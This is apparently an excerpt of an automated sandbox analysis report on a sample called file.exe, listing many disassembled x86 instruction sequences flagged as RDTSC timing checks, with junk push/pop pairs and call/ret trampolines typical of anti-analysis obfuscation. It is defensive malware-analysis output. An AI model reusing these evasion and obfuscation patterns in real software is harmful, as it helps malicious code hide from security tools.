    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D65F second address: 72D6F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A105DEB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 6D528A38h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FF7A105DEA8h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a mov dword ptr [ebp+122D2512h], esi 0x00000030 mov di, 4B77h 0x00000034 push 00000003h 0x00000036 call 00007FF7A105DEACh 0x0000003b push edi 0x0000003c pop edx 0x0000003d pop edi 0x0000003e push 00000000h 0x00000040 mov ecx, 038FFE98h 0x00000045 push 00000003h 0x00000047 jmp 00007FF7A105DEB5h 0x0000004c push A3C808ABh 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FF7A105DEB4h 0x00000058 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D6F3 second address: 72D6F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D6F9 second address: 72D6FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D6FD second address: 72D74E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 63C808ABh 0x0000000f or dword ptr [ebp+122D2669h], eax 0x00000015 lea ebx, dword ptr [ebp+1244D201h] 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007FF7A0B38028h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 call 00007FF7A0B3802Dh 0x0000003a mov edi, dword ptr [ebp+122D3AB3h] 0x00000040 pop esi 0x00000041 xchg eax, ebx 0x00000042 push eax 0x00000043 push edx 0x00000044 push esi 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D74E second address: 72D753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A19A second address: 74A1B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7A0B38037h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A1B7 second address: 74A1BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A1BB second address: 74A1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A1C5 second address: 74A1CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF7A105DEA6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A34D second address: 74A359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF7A0B38026h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A4B1 second address: 74A4B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A606 second address: 74A61B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A0B3802Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A61B second address: 74A621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A621 second address: 74A627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A777 second address: 74A77B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A77B second address: 74A787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A787 second address: 74A79A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7A105DEAEh 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A905 second address: 74A909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A909 second address: 74A930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007FF7A105DEACh 0x00000010 jnc 00007FF7A105DEA6h 0x00000016 popad 0x00000017 pushad 0x00000018 jg 00007FF7A105DEA6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A930 second address: 74A94B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7A0B38036h 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A94B second address: 74A952 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74AD85 second address: 74AD8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71FC82 second address: 71FC86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71FC86 second address: 71FCA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A0B3802Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007FF7A0B3802Fh 0x0000000f pop ecx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71FCA8 second address: 71FCAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B2A2 second address: 74B2B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF7A0B38026h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B2B0 second address: 74B2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B8B2 second address: 74B8B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B8B6 second address: 74B8CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF7A105DEA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007FF7A105DEA6h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B8CA second address: 74B8D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B8D2 second address: 74B8D9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752E7C second address: 752E81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752E81 second address: 752EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FF7A105DEADh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 jmp 00007FF7A105DEB5h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF7A105DEB2h 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752EC4 second address: 752EFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A0B38034h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c jng 00007FF7A0B38030h 0x00000012 pushad 0x00000013 jnl 00007FF7A0B38026h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push edi 0x00000024 pop edi 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75908A second address: 75908F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759457 second address: 75945D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75945D second address: 759471 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FF7A105DEA6h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75977B second address: 759785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF7A0B38026h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759A0F second address: 759A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007FF7A105DEB7h 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jne 00007FF7A105DEA6h 0x00000018 popad 0x00000019 jns 00007FF7A105DEB6h 0x0000001f jmp 00007FF7A105DEAAh 0x00000024 je 00007FF7A105DEA6h 0x0000002a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A336 second address: 75A33C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A33C second address: 75A340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A38E second address: 75A394 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A394 second address: 75A399 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A6C2 second address: 75A6C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75AFF2 second address: 75B044 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF7A105DEBEh 0x00000008 jmp 00007FF7A105DEB8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push edi 0x00000012 jmp 00007FF7A105DEB3h 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF7A105DEB7h 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B044 second address: 75B048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B110 second address: 75B132 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF7A105DEACh 0x00000008 jg 00007FF7A105DEA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 jmp 00007FF7A105DEADh 0x00000019 pop ecx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B132 second address: 75B137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B1E2 second address: 75B1E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B2D6 second address: 75B2E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FF7A0B3802Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B65D second address: 75B661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E2AF second address: 75E2B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E2B3 second address: 75E2F9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF7A105DEA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov esi, dword ptr [ebp+122D29DFh] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 xor edi, dword ptr [ebp+12448448h] 0x0000001e pop edi 0x0000001f push esi 0x00000020 sbb si, 5884h 0x00000025 pop esi 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 jng 00007FF7A105DEACh 0x0000002e jmp 00007FF7A105DEAAh 0x00000033 popad 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push ecx 0x00000039 pop ecx 0x0000003a pop eax 0x0000003b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75ECC5 second address: 75ECC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75ECC9 second address: 75ECD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FF7A105DEACh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 760E15 second address: 760E8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007FF7A0B38026h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jo 00007FF7A0B38028h 0x00000016 push edi 0x00000017 pop edi 0x00000018 jmp 00007FF7A0B3802Fh 0x0000001d popad 0x0000001e nop 0x0000001f push 00000000h 0x00000021 push ebx 0x00000022 call 00007FF7A0B38028h 0x00000027 pop ebx 0x00000028 mov dword ptr [esp+04h], ebx 0x0000002c add dword ptr [esp+04h], 00000018h 0x00000034 inc ebx 0x00000035 push ebx 0x00000036 ret 0x00000037 pop ebx 0x00000038 ret 0x00000039 jmp 00007FF7A0B38030h 0x0000003e or di, 5A0Eh 0x00000043 push 00000000h 0x00000045 movsx esi, di 0x00000048 mov dword ptr [ebp+1244CA70h], ecx 0x0000004e push 00000000h 0x00000050 mov esi, dword ptr [ebp+122D2812h] 0x00000056 push eax 0x00000057 push ecx 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 760E8C second address: 760E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7615BB second address: 7615CC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF7A0B38028h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 767085 second address: 767089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 767FD7 second address: 767FDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 767FDB second address: 768068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FF7A105DEA8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 call 00007FF7A105DEB1h 0x00000029 adc bx, 8C16h 0x0000002e pop ebx 0x0000002f push 00000000h 0x00000031 mov di, 6B66h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edx 0x0000003a call 00007FF7A105DEA8h 0x0000003f pop edx 0x00000040 mov dword ptr [esp+04h], edx 0x00000044 add dword ptr [esp+04h], 00000014h 0x0000004c inc edx 0x0000004d push edx 0x0000004e ret 0x0000004f pop edx 0x00000050 ret 0x00000051 pushad 0x00000052 jmp 00007FF7A105DEB2h 0x00000057 mov ah, dh 0x00000059 popad 0x0000005a xchg eax, esi 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e jmp 00007FF7A105DEAFh 0x00000063 pop eax 0x00000064 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 768068 second address: 768088 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A0B38030h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jnl 00007FF7A0B38026h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 768088 second address: 76808D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76A2A8 second address: 76A2AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76DF21 second address: 76DF43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A105DEB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007FF7A105DEA6h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76DF43 second address: 76DF4D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF7A0B38026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76BFC2 second address: 76BFD3 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF7A105DEA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76BFD3 second address: 76BFED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7A0B38035h 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 770F83 second address: 770FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF7A105DEA6h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007FF7A105DEAEh 0x00000014 jns 00007FF7A105DEA6h 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76BFED second address: 76BFF2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 770FAA second address: 77100B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 mov edi, esi 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FF7A105DEA8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007FF7A105DEA8h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 00000014h 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 and edi, 421621AAh 0x00000049 xchg eax, esi 0x0000004a push edi 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007FF7A105DEABh 0x00000052 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77100B second address: 771034 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A0B38039h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FF7A0B38028h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7703C2 second address: 7703E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FF7A105DEABh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF7A105DEAAh 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76F3A7 second address: 76F3AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772029 second address: 77202D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77202D second address: 772033 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77117B second address: 771180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7721D6 second address: 7721E4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FF7A0B3802Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7732DC second address: 7732E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7732E6 second address: 7732EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7732EA second address: 7733A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A105DEB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d call 00007FF7A105DEB3h 0x00000012 js 00007FF7A105DEABh 0x00000018 sbb bx, 6B58h 0x0000001d pop ebx 0x0000001e push dword ptr fs:[00000000h] 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007FF7A105DEA8h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 0000001Bh 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f mov dword ptr [ebp+122D1DEAh], ecx 0x00000045 call 00007FF7A105DEAEh 0x0000004a mov bx, ax 0x0000004d pop edi 0x0000004e mov dword ptr fs:[00000000h], esp 0x00000055 ja 00007FF7A105DEACh 0x0000005b mov eax, dword ptr [ebp+122D02B9h] 0x00000061 push 00000000h 0x00000063 push edi 0x00000064 call 00007FF7A105DEA8h 0x00000069 pop edi 0x0000006a mov dword ptr [esp+04h], edi 0x0000006e add dword ptr [esp+04h], 00000016h 0x00000076 inc edi 0x00000077 push edi 0x00000078 ret 0x00000079 pop edi 0x0000007a ret 0x0000007b push FFFFFFFFh 0x0000007d mov bl, B4h 0x0000007f or di, 99B8h 0x00000084 push eax 0x00000085 push ebx 0x00000086 push edx 0x00000087 push eax 0x00000088 push edx 0x00000089 rdtsc
